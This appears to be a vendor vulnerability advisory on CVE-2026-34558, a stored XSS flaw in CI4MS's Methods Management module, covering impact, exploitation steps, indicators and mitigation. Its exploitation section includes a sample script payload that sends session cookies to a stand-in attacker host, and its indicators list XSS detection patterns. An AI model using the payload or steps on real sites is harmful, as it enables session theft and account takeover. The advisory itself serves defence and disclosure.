CVE-2026-34558: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34558 is a Stored DOM-Based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton with RBAC authorization and theme support. The flaw exists in the Methods Management functionality, where multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding, and later rendered globally across administrative interfaces and navigation components. It affects CI4MS versions up to and including 0.28.6.0, and was disclosed on March 30, 2026, with a patch released in version 0.31.0.0. The vulnerability carries a CVSS v3.1 base score of 9.1 (Critical) per the GitHub Advisory, and 9.0 (Critical) per NVD (GitHub Advisory, GHSA).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-controlled input in the Methods Management module is stored server-side without sanitization or HTML entity encoding and later rendered unsafely into the DOM — likely via unsafe sinks such as .html() or innerHTML — across administrative interfaces and global navigation/menu components (GitHub Advisory). The attack vector is network-based and requires only low privileges (a standard authenticated account), with no user interaction required for payload execution once stored, because the injected method appears in the globally rendered navigation menu that loads on every backend page. Vulnerable fields include Page Name, Description, Controller, Method Name, Seflink, Page Order, Symbol (FontAwesome 5), Permissions, Parent Page, and Module, all accessible via the /backend/methods/ and /backend/methods/create endpoints. A proof-of-concept with step-by-step reproduction instructions and a video PoC are publicly available (GHSA).

Impact

Successful exploitation enables persistent, platform-wide JavaScript execution in the browsers of all users who visit any backend page where the malicious method appears in the navigation menu — including administrators. This allows session hijacking, CSRF token theft, privilege escalation, and full account takeover across all roles, effectively resulting in complete application compromise (GitHub Advisory). Because the payload is globally rendered in the navigation structure, a single injection by a low-privileged attacker can affect every administrative user without requiring any additional interaction from victims.

Exploitability

A public proof-of-concept with detailed step-by-step reproduction instructions and a video demonstration is available via the GitHub Security Advisory (GHSA). There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.046% (per Feedly/NVD data), indicating a low but non-zero probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Authenticate: Log in to the CI4MS backend with any low-privileged account that has access to the Methods Management functionality.
  2. Navigate to the vulnerable endpoint: Go to /backend/methods/create to access the method creation form.
  3. Inject XSS payload: Enter a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into any vulnerable field such as Page Name, Description, or Method Name.
  4. Save the method: Submit the form; the payload is stored server-side without sanitization.
  5. Trigger global execution: The malicious method is automatically rendered in the application's global navigation/menu structure. Any user (including administrators) who visits any backend page will automatically execute the stored JavaScript payload in their browser.
  6. Achieve objective: Capture session tokens or cookies to perform session hijacking, escalate privileges, or take over administrator accounts (GHSA).

Indicators of compromise

  • Network: Outbound HTTP requests from administrative users' browsers to unexpected external domains (e.g., attacker-controlled cookie-harvesting endpoints) originating from backend page loads.
  • Logs: Web server access logs showing POST requests to /backend/methods/create or /backend/methods/ containing encoded JavaScript payloads (e.g., <script>, javascript:, onerror=, onload=) in form field parameters.
  • Application Data: Presence of JavaScript payloads (e.g., <script>, event handler attributes) in stored method records within the database, particularly in fields such as Page Name, Description, Controller, or Method Name.
  • Browser/Session: Unexpected session invalidation or new administrative sessions created from unfamiliar IP addresses, potentially indicating session token theft and replay (GHSA).

Mitigation and workarounds

Upgrade CI4MS to version 0.31.0.0 or later, which contains the official patch for this vulnerability (GitHub Advisory). As interim measures, restrict access to the Methods Management functionality (/backend/methods/) to only highly trusted administrators, and audit all existing method records for malicious payloads injected prior to patching. Additionally, implement a strict Content Security Policy (CSP), set cookies with HttpOnly, Secure, and SameSite flags, and apply server-side input validation with contextual output encoding (HTML entity encoding) for all user-controlled fields in the Methods Management module.

Community reactions

The vulnerability received coverage from The Hacker Wire, which published a dedicated article on the Stored DOM-Based XSS in CI4MS Methods Management (The Hacker Wire). Additional coverage appeared on infinitsec.net and yazoul.net, highlighting the full account takeover potential. Social media discussion was noted on Mastodon, with community members flagging the severity of the global navigation-based payload execution. The vulnerability was also indexed by GitLab Advisories and ENISA's EUVD database (EUVD-2026-17214), reflecting broad awareness across the security community.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management